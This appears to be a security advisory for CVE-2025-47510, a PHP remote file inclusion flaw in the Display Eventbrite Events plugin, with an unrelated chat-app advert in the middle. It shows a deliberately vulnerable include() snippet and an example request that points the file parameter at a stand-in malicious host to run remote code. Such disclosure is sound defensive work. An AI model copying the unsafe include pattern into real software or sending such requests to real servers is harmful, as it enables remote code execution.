Overview
The CVE-2025-47510 vulnerability is a critical issue affecting the Display Eventbrite Events PHP program. It is an instance of the ‘PHP Remote File Inclusion’ vulnerability, resulting from the improper control of filename for Include/Require Statement in the PHP program. The vulnerability can potentially lead to system compromise or data leakage, making it a serious threat to the security of the affected systems.
Vulnerability Summary
CVE ID: CVE-2025-47510
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
Fullworks Display Eventbrite Events | All versions up to the latest
How the Exploit Works
This vulnerability exploits the improper control of filename for Include/Require Statement in PHP. An attacker can manipulate the file inclusion mechanisms in PHP to execute remote files. This can be done by tampering with the filename argument in the include/require statement, making it point to a malicious file on a remote server instead of a local file. Once the remote file is included, it gets executed in the server’s context, leading to potential system compromise or data leakage.
Conceptual Example Code
Here is a conceptual example of how this vulnerability might be exploited:
<?php
// The 'file' parameter value is taken from user input
$file = $_GET['file'];
// The file is included without any validation
include($file . '.php');
?>
In the above example, a malicious actor could send a request like `http://target.com/vulnerable.php?file=http://malicious.com/malicious`, which results in the inclusion and execution of the malicious file from the attacker’s server. This could lead to various malicious activities, depending on the content of the included file.

